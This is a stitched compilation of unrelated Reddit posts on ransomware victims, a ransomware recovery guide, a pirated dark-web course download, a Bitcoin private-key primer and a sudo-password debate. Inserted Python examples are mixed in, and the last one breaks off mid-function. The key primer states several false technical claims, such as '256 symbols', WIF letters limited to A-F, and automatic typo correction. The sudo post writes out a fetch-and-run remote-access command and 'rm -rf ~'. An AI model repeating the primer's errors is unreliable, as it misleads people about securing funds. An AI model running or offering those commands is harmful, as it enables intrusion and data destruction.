Remove Bitcoin ransomware (Virus Removal Instructions)

Disturbing Bitcoin Virus: Encrypts (instead of deleting) victims files, then demands transaction ID to decrypt proving they made a 2BTC payment to attacker... QuickBT received 2 separate calls about this just yesterday...

Preface: We allow Canadians to buy .4 Bitcoin quickly using debit.
As the title describes, yesterday we received a panic call from an innocent business owner whose business files (this virus targets AutoCAD, Illustrator, QuickBooks, PowerPoint and other business file extensions) had been encrypted by this virus. His staff and business were at a standstill until he could buy "Bitcoin" (which of course he had never heard of, and this was such a great first exposure for him...)
Apparently, the virus gave him an address and requested a transaction ID proving he made the payment. He only has 30 hours to do so, and cannot sign up for exchanges etc.
Has anyone else heard of this? It's TERRIBLE the more we think about it.
We are extremely reluctant to facilitate this type of transaction. However we CAN help very easily using our system.
If you go to a bank to take out ransom money to get a child back, is the bank complicit? One option we are considering is requiring a police report and approval; however, we are simply fuelling this scam then...
Thoughts?
EDIT: Apologies to the community for the aggressive "Bitcoin Virus" title. We can't change it now, but we will be more careful in the future not to slander the Bitcoin brand. We were just upset at how powerful this ransomware could be.
EDIT 2: Fast forward a few years - those attacks were common for a bit, but now security is stronger and taken far more seriously by consumers :) We are doing what we can: https://quickbt.com/pdf/20131010_QuickBT_and_cybercrime_requests.pdf
submitted by QuickBT to Bitcoin [link] [comments]

Bitcoin mentioned around Reddit: Several hospitals in Germany have come under attack by ransomware, a type of virus that locks files and demands cash to free data it maliciously encrypted. It will take weeks until all systems are up /r/besteurope

Bitcoin mentioned around Reddit: Several hospitals in Germany have come under attack by ransomware, a type of virus that locks files and demands cash to free data it maliciously encrypted. It will take weeks until all systems are up /besteurope submitted by BitcoinAllBot to BitcoinAll [link] [comments]

Customer hit with crypto-virus looking for advice

Have a customer hit with a crypto virus on the 11th who only just told us today. Able to retrieve company files from shadow copies on the NAS, but the PC running QuickBooks is past the point of no return.
First question: the files have .smile at the end; does anyone have any idea what virus may have infected the system?
Second question, customer is prepared to pay ransom, against my advice he emailed them and they want .5 of a bitcoin. I'm not advocating this but he wants to try. What's the safest way to buy Bitcoin?
We know and he knows he should have had backups in place; he was meant to take manual backups of QuickBooks but for whatever reason it did not happen. I'm not looking to apportion blame and the lesson has been learned.
Just looking for some guidance and advice on options.
Thanks guys.
EDIT: Thanks for all the input, everyone has been so helpful. We managed to figure out the virus was one of two: MedusaLocker or GlobeImposter 2.0. Neither has a public decrypter, and there is unlikely to be one due to a unique key assigned to each encrypted PC. Determined that the source was an email with a zip file disguised as a .odt file. Police were called but referred us to a site already recommended on this post. No cyber cover in insurance. Most files now recovered but some can't be, and deciding whether to pay the ransom or rebuild files. Post has been really helpful, wish I could share the amazing chocolate truffles that were supplied as a thanks.
submitted by dvdkp to msp [link] [comments]

How do I archive Ransomware files? (7zip)

I'm aware that files encrypted via viruses in the Crysis family are undecryptable until the creator releases the master key.
Knowing the history of users on bleepingcomputer forums releasing master keys to decrypt files, I'm counting on this slim chance to put my encrypted data in long-term storage until I have a chance to decrypt them.

This is not a "help me my files are encrypted" problem, but a "how do I compress encrypted video files if I can restore them in the future" type of question.



Backstory:
My son Jared was never the kind of kid that listened. He and his college buddies partied one night, his buddies were drunk, and they were hit by a truck; only my son survived.
He had pieces of metal in his brain and needed them removed surgically. I decided to put on a GoPro and record our journey; maybe someday we'd both look at these videos and laugh at each other.

To do his surgeries, I borrowed as much money as I could, even taking out my 401k with penalty. After three years of fighting, he had a brain infection on the left side of his brain and was in a vegetative state. I was not financially capable of helping him, and I made a decision I still regret to this day... to cut off his life support.

It was the worst moment in my life, but I had accumulated terabytes of recordings, like him doing dumb things and telling inappropriate jokes, I often look at these recordings when I'm feeling down.

Last year, I was traveling to see my stepmother. Stupid as I am, I Googled how to remotely control my computer, as I wanted to look at my computer when I was able to. I was recommended Windows RDP. Not knowing what security risk it poses, I opened up my system to the interwebs and made it vulnerable to hackers.

I was devastated when I came home. My work files are gone, that's fine for me, but my videos... Everything I worked for is now unopenable, with a ransom note attached demanding that I contact "support." The hackers asked for $5000 in bitcoin. I'm not a rich guy, and I do not have that kind of money.

After doing my research, I figured out how everything (technical) happened, but at this point, I'm counting on another computer guru to release a master key to decrypt these files.
All these files have their original file name, with an id, an email, and ends with .harma.

For now, I just need to put them in storage. How can I losslessly compress them? If I use lossy compression, will I still be able to uncompress and decrypt them if someday the master keys are released?
I'm willing to sit and wait, maybe ten years down the road, these computer hackers will find some good inside them.
submitted by FolleyMel779 to techsupport [link] [comments]
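For the archiving question above (and the earlier .smile thread), here is an added example of how a practitioner would triage and shelve encrypted files; it is not code from either post. It parses the renamed files, records a SHA-256 manifest so that bit rot or a lossy re-encode can be detected later, and measures compressibility to show why ciphertext should be stored uncompressed. The exact Dharma/Crysis-style name layout `<original name>.id-<hex id>.[<email>].<ext>` is an assumption inferred from the description (original name, an id, an email, ".harma"), and the file contents are constructed, not victim data.

```python
"""Triage and archive ransomware-encrypted files for long-term storage.
Added example for the archiving question above (and the .smile thread
earlier); not code from either post.  Assumption: the Dharma/Crysis-style
name layout  <original name>.id-<hex id>.[<email>].<ext>  is inferred from
the description (original name, an id, an email, ".harma").  The file
contents produced by constructed_samples() are made up, not victim data.
"""
import hashlib
import json
import os
import re
import zlib
from typing import Dict, List, Optional

NAME_RE = re.compile(
    r"^(?P<orig>.+?)\.id-(?P<id>[0-9A-Fa-f]+)\.\[(?P<email>[^\]]+)\]\.(?P<ext>[A-Za-z0-9]+)$"
)
ENC_NAME = "surgery_day1.mp4.id-1A2B3C4D.[contact@example.com].harma"
TXT_NAME = "jokes.txt"


def parse_encrypted_name(name: str) -> Optional[Dict[str, str]]:
    """Split a renamed file into original name, victim id, contact email, suffix;
    None for names that do not follow the layout (e.g. a bare '.smile' suffix)."""
    m = NAME_RE.match(name)
    return m.groupdict() if m else None


def compression_ratio(data: bytes) -> float:
    """Deflate-compressed size over original size (1.0 or more = no gain)."""
    return len(zlib.compress(data, 9)) / len(data) if data else 1.0


def build_manifest(files: Dict[str, bytes]) -> List[dict]:
    """One record per file: parsed name parts, SHA-256, size, and whether it is
    worth compressing.  Output of a sound cipher looks like random bytes and
    does not shrink, so archive it in store mode and keep the hash instead."""
    records = []
    for name, data in files.items():
        parts = parse_encrypted_name(name) or {}
        ratio = compression_ratio(data)
        records.append({
            "stored_name": name,
            "original_name": parts.get("orig"),
            "victim_id": parts.get("id"),
            "contact": parts.get("email"),
            "sha256": hashlib.sha256(data).hexdigest(),
            "size": len(data),
            "compression_ratio": round(ratio, 3),
            "store_uncompressed": ratio > 0.95,
        })
    return records


def verify_manifest(records: List[dict], files: Dict[str, bytes]) -> List[str]:
    """Names whose current SHA-256 no longer matches the manifest.  Bit rot, a
    lossy re-encode or a truncated copy all change the hash, and any such
    change makes the file undecryptable even if a master key is released."""
    return [r["stored_name"] for r in records
            if hashlib.sha256(files.get(r["stored_name"], b"")).hexdigest() != r["sha256"]]


def constructed_samples() -> Dict[str, bytes]:
    """Constructed inputs: random bytes stand in for ciphertext, plus one text file."""
    return {ENC_NAME: os.urandom(1 << 16), TXT_NAME: b"knock knock\n" * 4096}


if __name__ == "__main__":
    files = constructed_samples()
    manifest = build_manifest(files)
    print(json.dumps(manifest, indent=2))
    print("tampered:", verify_manifest(manifest, files))
```

The practical answer the script encodes: use 7-Zip in store mode (no compression) or plain copies, keep the manifest next to the archive on a second medium, and re-run verify_manifest after every copy. Lossy compression is off the table entirely; the decryption routine needs the exact ciphertext bytes.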

How Ransomware Encryption Happens & 4 Methods for Recovery

We know how overwhelming it can feel to be the victim of a ransomware attack and how your business cannot operate due to encrypted or locked files. This page delivers insight on why your files were encrypted or locked, and the options you have to decrypt ransomware. As a ransomware recovery service provider, we have helped thousands of clients successfully recover and decrypt their data.
Evaluating all options includes analyzing the encrypted files and, as the least desirable option, paying the ransom demand if necessary. Our process helps provide critical insight into decrypting ransomware and the available options that clients have.
By the end of this piece, it is our goal to show you what is involved to successfully recover your files. This guide outlines what steps and research are necessary to decrypt or unlock your files from a ransomware attack.

You’re the victim of a ransomware attack

You arrive to work and start noticing suspicious alerts coming from your servers, and none of the databases are functional. Your co-workers are frantic and cannot access any of their data. You investigate further and find all of the files on your network are renamed and discover ransom notes, and a screen asking you to email someone if you want your data back. You finally realize that you are a victim of a ransomware attack, and all of your files are locked or encrypted.

3 Common Ways Your Files Were Encrypted or Locked

Ransomware succeeds when businesses have poor security hygiene. Organizations that lack policies & procedures around data security will have a higher risk of ransomware attacks. Here are some of the most common ways to fall victim to a ransomware attack:

Open Remote Desktop Protocol Ports (RDP)

Businesses that have improperly configured network security may leave their Remote Desktop Protocol (RDP) ports open. Unknowingly, this is the equivalent of leaving the front door unlocked when you leave your home: it provides an opportunity for cyber attacks to come through with little deterrence.
Once a hacker is connected to your network, they can install ransomware and additional back doors to access your network at a later date. A large percentage of ransomware attacks still use this method of attack because so many organizations are not even aware of this security vulnerability.

Phishing Attacks

Ransomware can infiltrate your network by a malicious email campaign known as a phishing attack. Ransomware operators use massive networks of internet-connected devices (botnets) to send phishing emails to unsuspecting victims. These emails intend to trick the receiver into clicking on a malicious attachment or link, which can secretly install the ransomware virus or other malware.
Phishing emails are becoming increasingly difficult to detect as cybercriminals find clever ways to make a malicious email look legitimate. This underscores the importance of security awareness training for everyone in the organization, not just the I.T. department.

Compromised Passwords

The ransomware operators may have used previously compromised passwords from employees at your organization to gain unauthorized access to the networks. This derives from the poor security practices of reusing the same passwords for multiple accounts and authentication processes.
If your employees have been using old & weak passwords to access your business data, a cyber criminal can use a previously compromised password to initiate the attack. Remember to always follow good password hygiene.
The variety of attack vectors highlights the importance of a digital forensics investigation that can help victims understand how the ransomware came onto your computer and what steps you can take to remediate the vulnerability.

4 Options for Ransomware Recovery

In this section, we cover the options to restore files encrypted or locked by ransomware.

1. Recover files with a backup

If your files become encrypted in a ransomware attack, check to see if you have backups to restore and recover (in order).

2. Recreate the data

Even though your files are encrypted by ransomware, you might be able to recreate the data from a variety of sources as outlined below:

3. Breaking the ransomware encryption

The harsh truth is that the majority of ransomware encryption is unbreakable. This impossibility is a tough concept for many of us to accept, given the technological advances of our society.
Does this mean you should skip looking into whether the ransomware encryption can be broken? This option should always be explored if presented by a ransomware recovery firm, although the final choice is yours to make. We will lay out a real life example at Proven Data below to outline why this was a great decision for a company that was infected with ransomware.
While it tends to be rare, there are poorly constructed ransomware encryptions that have been broken by security researchers. If you can avoid paying a ransom, you should at all costs.
There can be flaws in the malware or weaknesses in the encryption. Businesses can look at these options, especially if time is on your side. There are also free ransomware decryption resources that provide tools for previously decrypted ransomware variants. A client of ours had hired a ransomware recovery company to recover their files until we discovered at the very last moment through our analysis that the encryption was breakable. With less than 20 minutes to spare, we saved the client out of paying a $450,000 ransom.

Why can’t most ransomware encryption be broken?

Ransomware is a cryptovirus, which means it uses cryptography in combination with malware to lock your files. Modern cryptography uses sophisticated mathematical equations (algorithms) and secret keys to encrypt and decrypt data. If strong encryption is used, it can take thousands, if not millions of years to break the encryption given the strength of today’s computers.
Encryption is a security tool created with the intent of data protection. It is a defensive tool to provide security, privacy, and authentication. Sadly, ransomware attackers are using it as a weapon against innocent victims.

How do I know if the encryption can be broken?

You can start off with this free ransomware identification resource to determine the feasibility of decryption. You will need to upload the ransom note and a sample file into the ID-Ransomware website, and it will tell you if there is a free decrypter or if it is an unknown ransomware variant. Please note that the tool is not always 100% accurate. If the variant is still under analysis, you will need a malware or encryption analyst to determine whether or not there is a possibility for decryption.
Encryption is designed to be unbreakable, which is why security researchers can’t simply make a tool for ransomware decryption. These unbreakable encryptions protect our bank accounts, trade secrets, government data, and mobile communications, among other things. It would be a significant security concern if there were a master decryption tool that could break encryption algorithms.

4. Paying the ransom to decrypt ransomware files

If the encryption is too strong, the only way to obtain the decryption key for your files is to pay the ransom. Many ransomware victims don’t have time on their side because they are facing significant business disruption. Each minute that passes could be a lost client, or worse for a medical organization.
Here is a list of the most prevalent ransomware variants that are known to be “cryptographically secure,” which means that Proven Data or the security community has confirmed the encryption is unbreakable:

I don’t want to pay the hackers ransom.

Businesses and individuals have the option of choosing not to pay the ransom in a ransomware attack to regain access to their files. For personal, political, or moral reasons, there has been resentment of the ransomware economy, and victims do not have to engage in extortion. If paying the ransom is the only option, you should know what to expect before considering moving forward.

How a ransomware recovery specialist can help

If you do decide to use a ransomware recovery company and if there is one thing you get out of this article, it is this: You should always question how a ransomware recovery company is recovering your data. If you are unsure, asking the right questions will ensure a transparent experience:
A ransomware recovery specialist can analyze your current situation and determine what options are available to you at the time of the inquiry. A competent and experienced ransomware recovery company should be able to provide the following:
Understanding how your files were affected by ransomware in the first place will provide you with the insight needed to prevent another attack. Whether you choose Proven Data or another company to decrypt your ransomware files, it’s important to know what unknowns there may be out there.
The threat intelligence we've gathered from thousands of previous cases enables you to make informed decisions in helping restore your data after a ransomware attack. If you require a company with such experience, we're standing by to assist 24/7.
submitted by Proven_Data to u/Proven_Data [link] [comments]

The ultimate dark web anonymity privacy & security course free download - freecoursessites.com

Learn how to access & use the dark net and the clear net privately, anonymously and securely

Privacy And Security Course
Created by Zaid Sabih, zSecurity. Language: English [Auto-generated]
Description
Welcome to the ultimate dark net, privacy, anonymity and security course. With no prior knowledge required this course will take you from a beginner to advanced in all of these topics; teaching you how to properly and securely discover data and websites on both the dark web and clear web, access hidden (onion) services, communicate privately and anonymously using instant messages and email, manually use end-to-end encryption to protect your privacy and make it impossible to read even if it gets intercepted, sign and verify files, share files anonymously, transfer funds anonymously using crypto currencies such as Bitcoin and Monero and much more! You’ll also learn how to do all of this in a secure manner making it very difficult for hackers or other entities to hack you or de-anonymise you, and even if you get hacked these entities won’t be able to easily control your system or de-anonymise you.
This course is highly practical but won’t neglect the theory. First you’ll understand the inner workings of each topic and each technique covered, then you’ll learn how to apply it in real-life scenarios, ultimately teaching you how to use the dark net and the clear net in a more private, more anonymous and more secure manner, so by the end of the course you’ll be able to combine the skills you learned and use them in any situation that requires more privacy, more anonymity or more security.
This Privacy And Security Course covers four main topics. I chose to cover all of these topics in one course because I think it is very difficult to learn one without the others, as they are very related. These main topics are:
1. Anonymity – anonymity is a state where your identity is unknown. Achieving this on the internet is not easy because of the way it is designed, so in this course you’ll learn a number of techniques to improve your anonymity. You’ll first learn what the TOR network is, understand how it works and how it can significantly improve our anonymity, then you’ll learn how to connect to it using the TOR Browser, using TAILS and using Qubes OS. You’ll also learn how to configure TOR properly to bypass censorship and connect even if it’s blocked!
2. Privacy – Using an anonymising network such as TOR is not enough to stay private and anonymous because the operating systems we use (Windows, OS X, Linux) constantly collect data about us, therefore in this course you’ll learn how to use two operating systems designed to be more private, more anonymous and more secure; TAILS and Qubes OS, you’ll learn how to install these operating systems on a USB stick so you can use them on any computer without affecting the original operating system and without leaving any traces!
There’s also a full section on encryption in which you’ll learn how the two main types of encryption work (symmetric and asymmetric), what end-to-end encryption is and how to use it to encrypt / decrypt and sign / verify data. This allows you to privately communicate and share any sort of data, whether it is simple text or files such as images, videos, etc., without worrying about it being intercepted.
The course also contains a full section on cryptocurrencies, because the payment methods we are used to using are not private and not anonymous. In this section you’ll learn what blockchains and cryptocurrencies are and how they work, and how to anonymously obtain two cryptocurrencies, Bitcoin and Monero, and use them to send / receive funds.
3. Dark Net – This is the portion of the internet that is not indexed by search engines and requires special configuration to access. Using anonymising networks and privacy-focused operating systems are 2 steps in the right direction of becoming more private and more anonymous, but unfortunately it is not enough: the services we use every day are not private and constantly collect data about us. The search engines (Google or Bing), the email providers (ex: Gmail or Yahoo), the instant messaging platforms (WhatsApp or Skype), the file sharing services (Dropbox or Google Drive), etc. are all not private, not anonymous and can be used to track us and de-anonymise us. Therefore in this course I will teach you how to carry out your normal day-to-day tasks in a more private and anonymous manner. First I’ll teach you how to search for websites and content on both the clear net and on the dark net, then I’ll teach you how to discover hidden services (onion services) to carry out your normal day-to-day tasks privately and anonymously (such as communicating using emails or instant messages, file sharing, etc.).
4. Security – All of the above will drastically enhance your anonymity and privacy and allow you to access both the dark web and the clear web privately and anonymously, but if you get hacked, the hacker will gain control over your system and therefore will be able to easily bypass whatever anonymity techniques you’re using and de-anonymise you, so all of the above is useless without security. Therefore in this course I will teach you how to do all of the above securely, then at the last section of the course I’ll show you how to take your security to the next level by dividing your operating system into a number of security domains, these domains are completely isolated and used for different purposes, therefore even if you get hacked only a small portion of your system will be compromised and it would be very difficult for the hacker to compromise the entire system or de-anonymise you.
With this course you’ll get 24/7 support, so if you have any questions you can post them in the Q&A section and we’ll respond to you within 15 hours.
Size: 6GB
Download link: https://www.freecoursessites.com/the-ultimate-dark-web-anonymity-privacy-security-course-free-download/
submitted by free_tutorials to u/free_tutorials [link] [comments]

What Is Bitcoin Private Key: Beginner’s Guide

Most of the people in this sub probably already know what the Bitcoin private key is and how it works, but there are many newcomers who do not fully understand all the technical aspects of it. I hope you guys will find it useful.

Bitcoin Private Keys: The Basics

Let’s start with some main principles.
  • A private key is functionally similar to a password to your email account. Unlike your email address, you never share it.
  • You need your private key to be able to receive the crypto someone sends you and to have access to your funds.
  • The BTC network does not store your private keys, they are generated and stored by the wallet software. There are different types of wallets.
IMPORTANT: The private key concept does not apply exclusively to Bitcoin. Other cryptocurrencies use it too.
Now, let’s see how a private key looks and works.

Bitcoin Private Key Definition

Bitcoin private key is an alphanumeric piece of code. It includes letters and numbers, just like your public address.
However, while a public address is like your plastic card number, a private key is like your CVC. You know, those secret three digits on the back of a card?
A private address is created in a random manner when you get a cryptocurrency wallet. The possibility of creating two identical private keys is almost zero, due to the sophisticated encryption algorithm we apply for the purpose.
In the BTC network, a private key contains 256 symbols, as we obtain it using the SHA256 encryption algorithm. This function always returns 256 symbols, no matter the input.

Bitcoin private key in various formats, including WIF.

Wallet Import Format (WIF)

Using such a long string of code is inconvenient, so a private key is often presented in WIF (Wallet Import Format). It’s a shortened version that includes only 51 characters (numbers from 0 to 9 and letters in the range of A-F) and begins with 5.
Here is a Bitcoin private key example in WIF:
5Kb8kLf9zgWQnogidDA76MzPL6TsZZY36hWXMssSzNydYXYB9KF
WIF has a few advantages over a full BTC private key version. As we have said, it’s shorter and more convenient to use. Also, it contains special pieces of code that serve to check the address for typos and correct them automatically.
WIF associates with only one private key and can be easily converted back into it, using an established algorithm.

Encrypting Private Keys

If a key looks like WIF but starts with 6, it is an encrypted version of a private key. People encrypt keys to ensure an extra layer of protection. To obtain such a string of code, we apply another algorithm. To decode (decrypt) the key we need to enter the password that we set when we were encrypting it.

How Bitcoin Private Key Works

You probably know Bitcoin as a digital payment system. To explain how it works, it would be better to compare it to a web messenger, with messages transferring value. These ‘value messages’ are BTC transactions.
And what role does a private key play in sending these financial messages?
Let’s take a look at a real-life example.


Using Private And Public Keys For a Transaction

Imagine you are sending 1 BTC to your friend Bill. You create a transaction and indicate yourself as the sender and Bill as the receiver of this amount. Then, you will broadcast the transaction to make the Bitcoin network aware of it.
  1. You start by choosing a private key. Using a special encryption algorithm, you derive a public key from it. You send this public key to Bill.
  2. You create a message for Bill and sign it with your digital signature. To obtain it, you pass your private key through a special encryption algorithm and attach the resulting code to the message. Every signature is unique, and you can use the same private address to produce an infinite number of them.
  3. Bill receives your message, public key, and signature and passes it through a signature algorithm. If it’s the message you sent, the algorithm returns ok.
Why do we need a digital signature in the first place? There are three reasons. First, it tells the recipient that the message is from the sender he knows. Second, a digital signature makes it impossible for the sender to deny he sent the message. Third, it confirms that no one has altered the message in transit.
Unlike a traditional signature, a digital one cannot be forged. To produce it, you have to possess a secret private key.

Why Keeping Your Private Key Secret Is Important

As we have mentioned, anyone in possession of your private key can steal your funds anytime.
If your wicked colleague Alice gets your private key (because you carelessly left your paper wallet on your desk), she can use it to create a digital signature. She can then use that signature to sign a transaction that will look like yours to the network. For instance, Alice can send all your crypto to another address. You will never be able to cancel this transaction and you are highly unlikely to know that she made it.
For this reason, you should be very careful with your private keys. Never send it to anyone using a messenger, or an email client, or a social media channel. Don’t share photographs of your private key. Never store a private key in a Google Doc file.
Please note that some desktop wallet apps store your private key in a standard directory on your hard drive. This place is a honeypot for hackers who know you are a cryptocurrency user. That’s why it’s extremely important to have up-to-date anti-virus software installed on your device.
Also, you may encrypt this wallet file to make it immune to malware. Many wallet apps provide this option. You will have to set a password to decrypt the private key, and the hacker will have to break this password to do it. If the password is strong, it will be a really difficult and time-consuming task.

Where To Store Private Keys: Mobile, Desktop And Hardware Wallets

As we have mentioned, the Bitcoin network does not store these keys. Instead, wallet services do it.

Mobile Wallets

Some of them allow you to keep and protect your private key, others do it automatically, applying various safety measures like 2FA or encryption. Note that nobody is responsible for it, your bitcoins will be gone if the service is hacked.

Desktop Wallets

Desktop wallets may be a good option. They provide BTC public and private keys in the format of a file that you can download and import. You can protect this file with a strong password and safely store it on a hard drive. Don’t forget about safe storage for this drive, too. For instance, use a bank vault for this purpose.

Cold (Hardware) Wallets

Hardware wallets are the safest ones. They are small USB devices designed to store your funds and private keys offline, away from anyone who could steal them. For this very reason, hardware (or cold) wallets are impossible to hack. If you accidentally lose, damage or destroy such a device, you can recover your BTC and private keys using a backup phrase. The best-selling models of hardware wallets are Trezor and Ledger Nano S, supporting several popular coins.


Paper Wallets

These wallets are sheets of paper with BTC private keys and a public address printed on them. Paper wallets look pretty basic and not very innovative, but it’s a safe way to store your BTC-related sensitive data. The main reason is that they are not connected to the Internet and thus are unreachable for malware attacks. This format is also immune to many mishaps that can affect electronic devices. To create a paper wallet you use a special web service like WalletGenerator.

P.S. Check out our blog if you are interested in more articles on crypto and finance
submitted by EX-SCUDO to btc [link] [comments]
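The WIF and signature sections above can be followed end to end in code. The block below is an added example written for this guide, not code from the original post: it implements Base58Check (the alphabet WIF actually uses: digits and upper/lower-case letters with 0, O, I and l removed), converts a 32-byte private key to mainnet WIF and back while verifying the 4-byte checksum, derives the public key on secp256k1, and signs and verifies a message with ECDSA so you can see that a changed message or a different key fails verification. Pure standard library; DEMO_PRIV is a constructed key for illustration, never a real wallet key, and the curve arithmetic is written for clarity, not constant-time use.

```python
"""Bitcoin private-key handling from first principles: WIF (Base58Check)
encode/decode with checksum check, secp256k1 public-key derivation, and
ECDSA sign/verify.  Added example for the guide above, not code from the
post.  DEMO_PRIV is a constructed key, never a real wallet key."""
import hashlib
import secrets

B58 = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"

def sha256d(b: bytes) -> bytes:
    return hashlib.sha256(hashlib.sha256(b).digest()).digest()

def b58check_encode(payload: bytes) -> str:
    """Base58Check: payload || first 4 bytes of SHA256(SHA256(payload))."""
    data = payload + sha256d(payload)[:4]
    n, out = int.from_bytes(data, "big"), ""
    while n:
        n, r = divmod(n, 58)
        out = B58[r] + out
    zeros = len(data) - len(data.lstrip(b"\x00"))   # leading 0x00 -> '1'
    return "1" * zeros + out

def b58check_decode(s: str) -> bytes:
    """Inverse of b58check_encode; a typo is detected (not repaired) by the checksum."""
    n = 0
    for c in s:
        n = n * 58 + B58.index(c)
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    data = b"\x00" * (len(s) - len(s.lstrip("1"))) + body
    payload, checksum = data[:-4], data[-4:]
    if sha256d(payload)[:4] != checksum:
        raise ValueError("Base58Check checksum mismatch")
    return payload

def privkey_to_wif(priv: bytes, compressed: bool = False) -> str:
    """Mainnet WIF: 0x80 || 32-byte key [|| 0x01 if the pubkey is compressed]."""
    return b58check_encode(b"\x80" + priv + (b"\x01" if compressed else b""))

def wif_to_privkey(wif: str):
    payload = b58check_decode(wif)
    if payload[0] != 0x80 or len(payload) not in (33, 34):
        raise ValueError("not a mainnet WIF private key")
    return payload[1:33], len(payload) == 34

P = 2**256 - 2**32 - 977   # secp256k1 field prime, group order, generator
N = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141
G = (0x79BE667EF9DCBBAC55A06295CE870B07029BFCDB2DCE28D959F2815B16F81798,
     0x483ADA7726A3C4655DA4FBFC0E1108A8FD17B448A68554199C47D08FFB10D4B8)

def ec_add(p, q):
    """Affine point addition; None is the point at infinity."""
    if p is None:
        return q
    if q is None:
        return p
    if p[0] == q[0]:
        if (p[1] + q[1]) % P == 0:
            return None                                      # p == -q
        lam = 3 * p[0] * p[0] * pow(2 * p[1], -1, P) % P     # doubling
    else:
        lam = (q[1] - p[1]) * pow(q[0] - p[0], -1, P) % P
    x = (lam * lam - p[0] - q[0]) % P
    return (x, (lam * (p[0] - x) - p[1]) % P)

def ec_mul(k: int, pt):
    """Double-and-add scalar multiplication (not constant-time; demo only)."""
    acc = None
    while k:
        if k & 1:
            acc = ec_add(acc, pt)
        pt = ec_add(pt, pt)
        k >>= 1
    return acc

def pubkey(priv: bytes):
    return ec_mul(int.from_bytes(priv, "big"), G)

def sign(priv: bytes, msg: bytes):
    """ECDSA over SHA-256(msg); a fresh random k each time, so signatures differ."""
    d = int.from_bytes(priv, "big")
    z = int.from_bytes(hashlib.sha256(msg).digest(), "big")
    while True:
        k = secrets.randbelow(N - 1) + 1
        r = ec_mul(k, G)[0] % N
        s = pow(k, -1, N) * (z + r * d) % N
        if r and s:
            return r, s

def verify(pub, msg: bytes, sig) -> bool:
    r, s = sig
    if not (0 < r < N and 0 < s < N):
        return False
    z = int.from_bytes(hashlib.sha256(msg).digest(), "big")
    w = pow(s, -1, N)
    pt = ec_add(ec_mul(z * w % N, G), ec_mul(r * w % N, pub))
    return pt is not None and pt[0] % N == r

DEMO_PRIV = hashlib.sha256(b"constructed demo key, not a real wallet").digest()

if __name__ == "__main__":
    wif = privkey_to_wif(DEMO_PRIV)
    print("WIF:", wif, "->", wif_to_privkey(wif)[0].hex())
    sig = sign(DEMO_PRIV, b"1 BTC to Bill")
    print("valid:", verify(pubkey(DEMO_PRIV), b"1 BTC to Bill", sig),
          "altered:", verify(pubkey(DEMO_PRIV), b"9 BTC to Bill", sig))
```

Two things the code makes concrete: an uncompressed mainnet WIF is always 51 characters starting with 5 (a compressed one is 52 starting with K or L) because of the 0x80 version byte, and the checksum only tells a wallet that a character is wrong; it cannot tell which one, so a mistyped key still has to be re-entered from the backup.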

CMV: Requiring a password for "sudo" access on desktop Linux systems is nothing but security theater.

Furthermore: on desktop systems it is perfectly fine to put NOPASSWD:ALL in your /etc/sudoers and similar in /etc/polkit-1/rules.d. In fact, I think this should be the default so users do not get a false sense of security.
For clarity, I'm not saying that all accounts should have sudo access, just saying that there's no meaningful security distinction between "sudo access with password" and "sudo access without password", and the "with password" path does nothing but wasting the user's time and giving them a false sense of security.
Argument #1: compromising a user account effectively compromises everything you care about.
As the relevant XKCD says, if your user account is compromised, the attacker can already do everything he probably cares about. This includes:
Yes, you can run a remote access tool without root. Starting programs at boot does not require root (see systemctl --user, .bashrc, crontab -e, whatever). Internet access does not require root (see: your browser). I frequently see users thinking that remote access kits require root for some reason. Thanks to the X protocol, keylogging does not require root access either on most systems.
The uses for root-level access I can think of are (1) to infect other users of the system, and (2) to install a rootkit infecting your firmware to survive OS reinstallation. The alleged other users most likely do not exist on desktop systems, and only advanced viruses would put rootkits in firmware; viruses with that level of sophistication may as well use the following point to gain root access after compromising a user account.
Argument #2: compromising access to a user account with sudo access effectively compromises root, and a password check won't stop that.
If your account is in the sudoers file, actively used, and an attacker compromises your account, there are a bazillion ways to get access to root. Here are some examples:
Since Linux has made it effectively impossible to use a system without occasional root usage, you will elevate yourself to root at some point, and at that point the attacker will be able to steal said root access one way or another.
Often-heard counterargument: "If you allow sudo without password and leave your computer unattended without locking it, then some passerby may be able to sudo something, but if sudo required a password, he wouldn't have the time to do one of the advanced techniques above."
Reply: targeted attacks can "curl URL_OF_REMOTE_ACCESS_KIT_INSTALLATION_SCRIPT | bash". Random passerby trolls can ruin your day with "rm -rf ~". Both can be typed fairly quickly and neither requires root-level access.
Although I do consider myself a security-focused person, entering my password upon every sudo is still something I consider a waste of keystrokes and a source of security myths. Since the majority of the Linux world seems to disagree with me, I would like to know whether there's something major I'm overlooking.
submitted by ArchaicArchivist to changemyview [link] [comments]
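Whichever side of the argument one takes, an administrator wants to see what a given system has actually configured. The following Python script is an added example, not code from the thread: it parses sudoers-style text and reports NOPASSWD grants together with the two Defaults that decide what a password prompt buys (timestamp_timeout, which controls how long a successful authentication is cached, and use_pty). The sample sudoers text is constructed for the example, and the helper names are this example's own; aliases, includes and line continuations are out of scope.

```python
"""Added example (not from the thread): audit sudoers text for NOPASSWD grants
and for the Defaults that decide what a password prompt actually buys."""
import re

# Constructed sample sudoers content; not copied from any real system.
SAMPLE_SUDOERS = """\
# /etc/sudoers -- constructed sample for the audit example
Defaults    env_reset
Defaults    timestamp_timeout=0
Defaults    use_pty
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
alice   ALL=(ALL) NOPASSWD:ALL
%admin  ALL=(ALL) NOPASSWD: /usr/bin/apt, /usr/bin/systemctl
# bob   ALL=(ALL) NOPASSWD:ALL   <- commented out, must not be reported
"""

# Tag prefixes sudoers allows in front of a command list.
TAG_RE = re.compile(r"\b(?:NOPASSWD|PASSWD|NOEXEC|EXEC|SETENV|NOSETENV|"
                    r"LOG_INPUT|NOLOG_INPUT|LOG_OUTPUT|NOLOG_OUTPUT)\s*:\s*")
# user  host=(runas) [tags:] commands
GRANT_RE = re.compile(r"^(\S+)\s+([^=\s]+)\s*=\s*(?:\(([^)]*)\))?\s*(.*)$")
DEFAULTS_RE = re.compile(r"^Defaults(?:[:@!>]\S+)?\s+(.*)$")


def parse_sudoers(text):
    """Split sudoers text into (defaults, grants).

    defaults: option name -> value string, or True for a bare flag.
    grants:   one dict per user/group specification line.
    """
    defaults, grants = {}, []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments and blanks
        if not line:
            continue
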